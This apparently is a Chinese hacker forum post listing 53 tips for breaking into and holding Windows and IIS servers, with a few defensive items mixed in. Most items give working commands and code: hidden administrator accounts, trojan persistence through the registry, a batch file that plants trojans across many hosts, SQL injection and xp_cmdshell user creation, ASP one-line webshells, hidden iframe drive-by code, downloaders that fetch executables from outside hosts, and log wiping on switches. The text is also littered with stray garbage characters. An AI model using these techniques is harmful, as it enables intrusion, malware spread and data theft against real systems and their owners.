1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,5 w: \5 O! e5 k4 }) e. c; \* z
cacls C:\windows\system32 /G hqw20:R
: M7 ]% A! n& Q; d0 K思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
' r4 Y6 A0 [, q6 \恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
$ c+ F' l/ y4 n/ B. N: `
' e& a. ~# |1 h8 f2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
. ~0 |& y$ B* z1 [4 c4 F5 r6 T8 P3 y( _. R. @0 G
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
! Y# a- v; B4 k; W% A
/ v1 e" e5 `+ M7 _4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号1 P& G3 s$ ~# r2 n
% \# v% w! t$ [" H5、利用INF文件来修改注册表
t) a1 Z& x5 g) |2 H v[Version]% R$ E1 E9 W/ B. P# m+ m
Signature="$CHICAGO$"
' }9 S' P* ?8 V4 C[Defaultinstall]
+ P3 t0 [: U# `) x l. `addREG=Ating
+ b1 h4 ?2 J( \[Ating]
0 b1 ?% D# d% u8 {% n( ZHKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
' W6 h1 i0 u l |/ f h以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:' X& t' s3 F9 `& o
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径: |* @! |* h0 e% O
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU1 F3 P# z! v) p" Q: X
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
& n( Y, ~. t& F8 IHKEY_CURRENT_CONFIG 简写为 HKCC( P3 \; S% a5 o; F; P
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值
1 q+ [% e/ B- T9 W. M- h"1"这里代表是写入或删除注册表键值中的具体数据8 `; L# e$ `: @0 I
/ z6 g! @& \, P& `% T1 c6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
) j0 g k. k: c6 C0 _3 p! M多了一步就是在防火墙里添加个端口,然后导出其键值. `. |8 X/ ]! F6 D7 ~" @9 y
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]# ? h- a) Y( l# n$ d; o
7 E+ y8 H5 _2 y! p2 w, `6 L, m4 J
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽6 U J. R7 J" @$ }1 @ D
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。5 o& i6 j1 |6 L: Q) B
) P: z7 @# \2 b
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。. P) H0 @ v" M) \+ {
7 S; P) T3 Z6 g6 J5 g* z' _
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
, P5 c. m3 {/ u可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
J4 V/ s9 T1 A2 j8 ^, S" k9 i* v% g& J3 }$ V$ m' r
10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”5 t/ n$ K( \; b2 q+ K
3 t8 R: }% y+ J; p6 I11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
3 i t* r) ~5 l/ G用法:xsniff –pass –hide –log pass.txt
( T: _% T. _5 Y
0 G, v/ J3 V) R: l* L' R12、google搜索的艺术
! t1 ]2 k7 x' J! h( ~5 g: U; i搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
: B6 D$ f* Q L% C或“字符串的语法错误”可以找到很多sql注入漏洞。
0 s& g) b& e9 o3 a) t
, T" P, ^+ |" P+ `& Q13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。) f! a2 }4 Q7 i0 a, |* z
) j/ p) W# z+ W* y8 Y# e+ r x \) r) l
14、cmd中输入 nc –vv –l –p 1987
' ] M: z! f9 G+ l X) f做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃. \+ [3 i" g( G
Y" d8 ?( Z. b* w5 O$ s: |
15、制作T++木马,先写个ating.hta文件,内容为3 S' k+ b0 w! F: r
<script language="VBScript">
6 S5 p( g/ e1 _; p) @- ]. zset wshshell=createobject ("wscript.shell" )/ A2 N6 x2 e) g! f+ F9 Q
a=wshshell.run("你马的名称",1)
/ q( m* K$ n, xwindow.close9 ]. Y1 U, b6 k
</script>
; M. F+ U! k' |* t! w& M4 |' F# _再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。0 j b' S H6 q
5 P( f- v" k& R7 \3 N6 ~ @0 Q* G! n
16、搜索栏里输入8 X: Y! @, p0 Z! G" R" J, @7 }3 p
关键字%'and 1=1 and '%'='
3 G4 A6 ~' A7 E5 s关键字%'and 1=2 and '%'='" x; q7 g' v: M' O8 z% f1 x6 ?7 D
比较不同处 可以作为注入的特征字符/ g& M* e2 V7 W0 T8 Q
: Y. N& _- O" t' _8 c. s17、挂马代码<html>7 q0 j! j& M; L. u
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>9 _& J5 Y+ {* `' A' x& q$ ~6 I
</html>
4 p( `( j) r8 o- n; T/ L6 [8 n4 i! ?+ T
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
9 y" t) A7 @3 _1 ^net localgroup administrators还是可以看出Guest是管理员来。
# f5 t) }* S$ D- x% c! h8 w5 T2 Q3 y3 ?( P
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等% e* v1 w+ ]' H: A& X
用法: 安装: instsrv.exe 服务名称 路径2 ~) t& O' v: K" e3 }% {
卸载: instsrv.exe 服务名称 REMOVE* ` d$ a$ B! e; e9 Y
4 N1 x& x7 O/ {) K9 R1 K$ s
0 O" W; ^# R' E1 T3 }* G
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉/ C$ N& t3 }! D E3 m* ~
不能注入时要第一时间想到%5c暴库。
& b9 F! M2 z8 n: q$ c# H5 \% y% ?3 J. C/ R+ \
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~$ Z: C, p. W+ T0 A% H- R% O/ W9 F
3 z7 f* d/ q$ T$ D6 ]+ [23、缺少xp_cmdshell时
8 J5 x9 i# A: z, E尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
# h) \" s6 u) I: H假如恢复不成功,可以尝试直接加用户(针对开3389的)% x$ h+ `" L& D* D5 w8 R1 z/ S" g3 \4 {2 N
declare @o int
" a! C& P. \6 xexec sp_oacreate 'wscript.shell',@o out: b o4 u& O; k1 {$ o8 }
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员8 z2 Y$ P8 c: J4 f2 V6 Y
3 Z, ~. v% k0 |# r% y: k24.批量种植木马.bat% R$ l" Z0 I8 A1 X1 K4 Q9 U, u: G
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中! J( o1 R+ N8 O' r/ N: s
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
' f% d, d6 V' C2 x# B& `扫描地址.txt里每个主机名一行 用\\开头& g1 t0 L' W, S: U2 i
% Y8 B) i7 N- ?5 z25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。% P, ~6 @6 U* O+ i
2 p5 d; d( o* n, j$ q
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
4 |& v4 m2 }! K将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
8 `9 O/ f9 m7 z6 j$ U$ ~# q.cer 等后缀的文件夹下都可以运行任何后缀的asp木马' P3 ]; e" O. y7 r
: N; J2 _- L4 m27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
! D6 w/ _7 v6 N然后用#clear logg和#clear line vty *删除日志7 M/ [" B5 O. r, I
3 E) o- D1 c- A1 k; I2 ]+ V28、电脑坏了省去重新安装系统的方法7 ^. C1 m) Y- c' j
纯dos下执行,
1 G/ K3 Z2 t7 `0 I3 H P7 q+ H5 S Oxp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config, Q" E" o3 N5 S: C6 ^, z4 v
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config. D% G9 ~0 k* C- F o
6 Y9 v X7 Q8 `
29、解决TCP/IP筛选 在注册表里有三处,分别是:
; v! ^+ f. V/ I/ }5 e& J7 NHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip* `% c/ |/ v3 q2 M r) u3 U
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip6 Z" j" m2 i- T
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip/ T7 u9 ]0 l& C
分别用; \! O! B. ?9 E( a) S7 N' p& N
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
2 Y0 \; m6 X& g* vregedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip P# e' `! l d% E% g
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip5 V x" h( L) x- G w+ {
命令来导出注册表项* f) U/ |3 U+ u( x, A$ J
然后把三个文件里的EnableSecurityFilters"=dword:00000001,/ J8 S; c9 m+ o: C
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用% b5 s8 S& c7 l
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。& U- z% a4 t) P4 s
9 E: i5 v1 Q% s! B30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
9 ]& e- O( j1 G8 v% G/ }SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
6 a6 s8 N7 e" \* k$ [9 q @/ ]& W* w" B
31、全手工打造开3389工具# W z D' I$ `
打开记事本,编辑内容如下:
# Y; ~- H! C) }- `) t: Secho [Components] > c:\sql
! P7 H" B. g( Q' H2 [0 e7 becho TSEnable = on >> c:\sql
* L( M# b t/ @" s* y( Osysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q8 H f, F3 W( N0 ~
编辑好后存为BAT文件,上传至肉鸡,执行! k( ]7 f$ F- K& a
5 ?( U! i/ x3 i6 A+ g$ h# w0 l32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马
/ ^8 z2 F3 |# n# v; p7 u% a9 z' G; e _9 a6 a
33、让服务器重启
B1 ~% A! Q/ R/ H6 D- }4 n写个bat死循环:
0 {% ~4 r0 l% R! W8 ^4 P@echo off
% S* s* K; L3 l, v5 Z+ F' f:loop1, T6 i9 W" U& I' m. m0 c: o
cls
7 h* k# }9 p3 x& d2 U% hstart cmd.exe
& q' ^# `$ k. V1 fgoto loop1( { e* v4 d( _8 t2 a
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
4 c5 ^# C" J" G/ a* d7 p+ u
/ F9 w% z B+ a* V4 W# T& g( {3 }; t34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,; _, p. O6 Q f9 N
@echo off
5 o. k' ?; }6 }# W- r: q8 Idate /t >c:/3389.txt, W! e2 Z: |9 v; @- N
time /t >>c:/3389.txt
' _% f3 P/ U8 a" uattrib +s +h c:/3389.bat
4 K2 c6 q7 R) M' h) Y+ s& Kattrib +s +h c:/3389.txt7 a* @9 y# u. ^5 l( j" o" P
netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
& k: I0 n% C9 [1 H并保存为3389.bat! H& R! x7 n q q
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
& X* b( x1 i5 o8 C, H: s
3 j6 A% C: ?2 |+ U$ F35、有时候提不了权限的话,试试这个命令,在命令行里输入:
0 G0 F# Y _( C% g7 H/ h) s/ fstart http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)
9 ~; W* }; t" }5 D% L输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。; I- I) Y V. w! c
" y: G; i( Y; G+ v7 n8 V! G
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
' }' [) v' X+ ^0 Gecho open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
* A# L' I7 Q* Y3 H Hecho 你的FTP账号 >>c:\1.bat //输入账号5 G. u. A: E3 W% g) W; F- U
echo 你的FTP密码 >>c:\1.bat //输入密码# f# _2 M& K& @
echo bin >>c:\1.bat //登入: c2 {; x$ T. w" i. Z
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
4 Y7 S+ _" |' @echo bye >>c:\1.bat //退出; T3 o' t+ [7 \. ^
然后执行ftp -s:c:\1.bat即可
/ G( q4 B5 [* W
$ s" h! W" }! I37、修改注册表开3389两法
5 L5 N) r5 k+ `(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表- f# l; t9 c$ }5 r
echo Windows Registry Editor Version 5.00 >>3389.reg
t! ?9 ^& e3 V% z+ E+ |' Z/ \echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
$ f: G$ u9 P8 ~ G( J$ H( d4 n& d1 f+ _echo "Enabled"="0" >>3389.reg
9 e+ ]" w: x& e. Lecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows- {8 h, p4 f- Y) }* ~; @7 _
NT\CurrentVersion\Winlogon] >>3389.reg! n* x" k) Y: T- y* ^3 h6 |
echo "ShutdownWithoutLogon"="0" >>3389.reg
8 e8 f4 l& q6 oecho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]* ?* s3 Z/ s% ^% n; R1 d/ Y
>>3389.reg1 h* n2 r4 X" S
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg
3 {; {8 {6 n& J* v0 j3 d3 E, ~echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
" t5 B& G- K |! M3 @9 Y>>3389.reg' W* X6 d8 s" W# S% L1 x
echo "TSEnabled"=dword:00000001 >>3389.reg4 ?# [4 u2 h, K+ f- Y8 J
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
, t, _6 K8 r' a9 ~echo "Start"=dword:00000002 >>3389.reg6 [9 I1 |2 Q" ]. {! v! W1 [: S1 A1 f) A
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]/ ?* |3 Q0 N! k% V2 M/ J
>>3389.reg
4 Y; d7 J$ m$ zecho "Start"=dword:00000002 >>3389.reg4 X: I! Q; o# g5 a7 \. j% \
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
& G; s8 X! U) K* u1 {echo "Hotkey"="1" >>3389.reg8 e# y- y$ X- i; D; z' C$ X* U
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
+ A7 o0 w9 ]: Z/ B6 PServer\Wds\rdpwd\Tds\tcp] >>3389.reg
P! F6 @; {, r! A7 k7 o# g4 ]echo "PortNumber"=dword:00000D3D >>3389.reg# v: u+ _( _ t& C
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
1 |, m" Y1 c% M. P4 n7 UServer\WinStations\RDP-Tcp] >>3389.reg$ T; g+ E7 T3 o+ t( d& \0 C6 ~
echo "PortNumber"=dword:00000D3D >>3389.reg, K2 p' B; ]: R' |0 y
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
) Z# E9 p" `( O% g1 E Q. [ Z(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)% ~) A& k d/ s8 S3 S4 @9 L
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
! k/ I+ m- ]2 W0 o0 i(2)winxp和win2003终端开启7 W- {: |5 Y! P N
用以下ECHO代码写一个REG文件: N% ?, C; N1 _; a$ z* M
echo Windows Registry Editor Version 5.00>>3389.reg
& b- m" C% S$ P4 Necho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal/ V5 h$ }6 T" G4 E6 j! o- M6 {
Server]>>3389.reg
8 `' _+ L, u9 {" Z* ]: R3 }echo "fDenyTSConnections"=dword:00000000>>3389.reg4 W9 s& a; X; V6 t. |- o
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
' D, g* R! R( ?4 F" q* a. K2 M/ w( OServer\Wds\rdpwd\Tds\tcp]>>3389.reg
6 e) F2 X- G! ^5 Mecho "PortNumber"=dword:00000d3d>>3389.reg
6 Y1 Q9 R. }4 _" b6 F$ Y1 ^0 }echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
3 e; S* m J" f' Z% uServer\WinStations\RDP-Tcp]>>3389.reg' T# L' c. l& g: ]( r
echo "PortNumber"=dword:00000d3d>>3389.reg9 s6 G; n$ ?9 G& O$ D
然后regedit /s 3389.reg del 3389.reg
6 D' a& z# ~) m% y5 ^1 `XP下不论开终端还是改终端端口都不需重启8 b# b) {# `- Z- x
* o+ I( z% `. ~4 w, B" }; V- d' d6 q38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃 c9 T4 _" v' l) U" x( U
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
: z& w- K% f' M: c4 {8 F. M, c% m" H2 i
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的! p1 `4 B& D& D" P
(1)数据库文件名应复杂并要有特殊字符
* X0 b2 R4 K( f$ [(2)不要把数据库名称写在conn.asp里,要用ODBC数据源; B- C9 e2 o7 U, X& p; C
将conn.asp文档中的
6 L) g% s. Q+ j6 x% s- P- RDBPath = Server.MapPath("数据库.mdb")
0 Q- y/ Q/ ~* a6 K/ y# W, [conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath" G7 M) R+ v. N+ F! F7 `
# {6 ~* M/ ~' f5 t修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置% O y3 ]8 Z% Q' ]& Z6 S
(3)不放在WEB目录里8 l& w1 C* }, Z
" |9 f+ f0 m+ t4 F9 Z4 v$ p y40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉2 Z) m3 h, \. N ^3 G% F8 X2 `
可以写两个bat文件* U: n. ]7 D1 h$ G4 m1 |
@echo off
$ ~( |8 [8 g9 ~0 v' J@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe5 t% f# Z, Q7 ~, o+ M5 u
@del c:\winnt\system32\query.exe
9 f) Y: [$ z* w0 G+ s@del %SYSTEMROOT%\system32\dllcache\query.exe
$ X# m1 M+ X+ s@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
" }+ e+ j- [8 E L# M0 F
: E3 s6 R7 O" J7 R2 `; o% y@echo off6 T$ g- @: W. V; I
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
$ U$ ~) V7 x9 M5 Y& W9 b@del c:\winnt\system32\tsadmin.exe
! @2 U; ~+ O# S! h) h% G5 F. h@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
" g) J4 _- v9 ^( {# P: g! |2 D; B8 V5 Q2 h
41、映射对方盘符
. q, K6 K; _. T1 F1 rtelnet到他的机器上,
$ `( L+ p9 a& Y+ wnet share 查看有没有默认共享 如果没有,那么就接着运行4 }" o; a6 g" |" u! L: Z! ?/ R
net share c$=c:# j0 K0 P& L7 y. U
net share现在有c$
1 k8 l0 u7 J) x+ ^- Z& T# C, g5 M3 y在自己的机器上运行
- e7 C& q' m* o! b% t% knet use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
# S/ X4 u3 _- o
; w4 b! c3 v J7 R42、一些很有用的老知识, m8 _/ u# m G
type c:\boot.ini ( 查看系统版本 )5 P/ }8 p9 |7 x2 y3 b4 R, V
net start (查看已经启动的服务)
" t V1 V" R4 c6 Cquery user ( 查看当前终端连接 )' B. q2 v3 f( e: v0 L: m8 u' D
net user ( 查看当前用户 )' ~& ~3 c. o3 r8 B, l) H$ g
net user 用户 密码/add ( 建立账号 )
# ^' ~& q" k( O# a! q7 nnet localgroup administrators 用户 /add (提升某用户为管理员), a% \7 d9 N5 P/ Z' D$ c0 Z, w2 P
ipconfig -all ( 查看IP什么的 )" x' g) U. N6 T$ C
netstat -an ( 查看当前网络状态 )
4 ]9 I" |$ Y) K; q! ^4 mfindpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
8 ?6 _* A" C! `5 \. m克隆时Administrator对应1F4& {# S- |7 k9 H6 `7 i
guest对应1F5. {' a# B# P9 ]5 a7 \
tsinternetuser对应3E8
& f) [" c. u8 e) u
% i9 X! r* K4 p2 o. {5 P z! }43、如果对方没开3389,但是装了Remote Administrator Service5 m8 X, c& f" F, ~7 K8 o
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
6 _4 y. [# d( D7 X# e. P3 ^解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
+ s% B7 E/ Z5 n7 x+ m先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
3 b# d! O) p6 M6 {) M, ]8 u2 ?( r( b; i3 z5 c3 q
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
2 u l0 b; o: q( T# X5 B }/ V本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)7 n, D" w: f6 N5 k w( |& K
B: \ q t1 E8 C' R45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
/ s- ?! w Q; Y' z6 i. secho Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
5 M# _4 m/ @+ K9 F5 d9 K^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
E& Y& n" f( D( KCreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
: U" U% }) s& t ]' `1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs& V" \' U1 K9 E4 Q
(这是完整的一句话,其中没有换行符)1 }% N( ]* h0 [
然后下载:
& U$ V# Y# e, X. q$ D( h+ Ccscript down.vbs http://www.hack520.org/hack.exe hack.exe
: ]4 D0 }: {0 @$ l9 |: A" Y. s# {7 a6 \- y; a2 a
46、一句话木马成功依赖于两个条件:: w& B3 C* r+ W
1、服务端没有禁止adodb.Stream或FSO组件& o. L2 C2 c8 U; o7 c _
2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。8 | F5 `( R. ?
0 h! p0 h8 j* I( ~3 g- a47、利用DB_OWNER权限进行手工备份一句话木马的代码:) M6 [, l* n( k& Z! N: B0 C9 P
;alter database utsz set RECOVERY FULL--
: f+ Y0 C% r3 }3 };create table cmd (a image)--( k& V/ K" W5 b9 o; r- E+ e% F
;backup log utsz to disk = 'D:\cmd' with init--0 n% A Y: j3 c0 D4 ~8 R9 Y+ l
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--9 @5 k$ I4 I& F& U) E( u
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
9 t8 h, q6 t& A* @9 f0 m1 k+ e注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
' O/ {5 [. |/ H Y! m, Q8 ]
O- I7 p7 n$ V8 A, P; V48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
" d! k; Z5 x& O/ H3 L( M3 d5 i; p1 P) N/ A; H6 O
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options$ _! T# Z# h; @/ r8 _
所有会话用 'all'。
5 u S& W; }( A5 l-s sessionid 列出会话的信息。5 z9 D6 W: o: J" Z% c; t! v% X: Y
-k sessionid 终止会话。
6 n+ c0 r( `& S1 d; H) h-m sessionid 发送消息到会话。5 ^& n! q0 k8 [7 L- }) b+ X
2 r% l$ E6 [ y- I( w
config 配置 telnet 服务器参数。
. T( C; z8 \7 h ~6 {5 c! T% e, T5 E* U* H& ~# r4 M% P$ r
common_options 为:
" U4 X. u& O8 R, \* Z-u user 指定要使用其凭据的用户
5 U2 [" k% q \& r7 S+ R; B-p password 用户密码' \' G& J; F3 ?+ J8 }
8 S7 ]8 Y1 ?$ ?( n
config_options 为:
. b4 z k& M: \1 R) wdom = domain 设定用户的默认域
5 M* M. n+ E, m4 uctrlakeymap = yes|no 设定 ALT 键的映射
/ L* f6 h* L9 ?6 ztimeout = hh:mm:ss 设定空闲会话超时值; ]* ?- ?4 U7 m. b) M- W
timeoutactive = yes|no 启用空闲会话。
. n2 v% j+ O1 r- i* t5 d Gmaxfail = attempts 设定断开前失败的登录企图数。
: i) F# N+ j$ H& ]" d- f# vmaxconn = connections 设定最大连接数。
0 R" B) k) @: o/ R0 j/ F6 ~* \port = number 设定 telnet 端口。3 A% [( g+ k L% y9 O+ M+ z; [
sec = [+/-]NTLM [+/-]passwd9 g4 o4 c* y* V, V( l7 W+ L9 e
设定身份验证机构( f! s" m! d; N5 q8 f- M
fname = file 指定审计文件名。
: k" `7 t: V8 k, x5 Wfsize = size 指定审计文件的最大尺寸(MB)。) f* j4 V( R: @, _8 R
mode = console|stream 指定操作模式。
8 q+ q8 [' L3 E+ s$ W$ f- eauditlocation = eventlog|file|both
0 x) R! {5 ]) W! ?* ~0 T% ^指定记录地点& D: x* \* q, \' L# e% z! Q
audit = [+/-]user [+/-]fail [+/-]admin
# l& D5 }% P* w0 [
" p* U l: D! M( G49、例如:在IE上访问:6 D% h4 S, r$ M3 Z* L, N
www.hack520.org/hack.txt就会跳转到http://www.hack520.org/% ]' U$ r7 {" t# A: P6 ]
hack.txt里面的代码是:
1 k/ v! c2 H% a% U) v' P0 }<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
# f" R" K H8 G& n# {- `+ i" S7 P把这个hack.txt发到你空间就可以了!( U( R6 B, O4 k& f) [
这个可以利用来做网马哦!
/ Y+ n0 G( N/ e9 h
* L" C9 z$ m2 m% _" m50、autorun的病毒可以通过手动限制!6 |- A' e" }, h% d) P U/ ~- l5 e
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!) ~" q* ~1 F* k" U8 v8 y2 s
2,打开盘符用右键打开!切忌双击盘符~% D- k4 {+ F+ Z
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
1 A; j9 K8 I- p, W) q
5 ]7 r1 A1 Y2 c9 i" ]* w) m51、log备份时的一句话木马:
+ [" j+ [5 T3 e) j: _" ra).<%%25Execute(request("go"))%%25>
. L& ^- P8 K6 lb).<%Execute(request("go"))%>" ^! t! K" a+ ?; P
c).%><%execute request("go")%><%
: }/ M2 L. @5 gd).<script language=VBScript runat=server>execute request("sb")</Script>2 i# g# K' ~ h
e).<%25Execute(request("l"))%25>8 @' ] i8 p( ]+ I8 L% n+ y9 m/ C
f).<%if request("cmd")<>"" then execute request("pass")%>5 ?" s- I. Q# K+ @- s$ @" K, U- M
% U+ ?, ]: |2 ^; T( A
52、at "12:17" /interactive cmd' j& ?( w; g w7 b* `. S* y- S6 |, ~
执行后可以用AT命令查看新加的任务
7 B" e" u' [& S. o1 U用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。
+ ?8 Z0 Y9 D+ d% Z) g* N
2 t" L: l- i" s3 \53、隐藏ASP后门的两种方法# f+ P+ f( @' G
1、建立非标准目录:mkdir images..\* x6 @# R: u# Q6 |' d. l. u* U X5 |
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
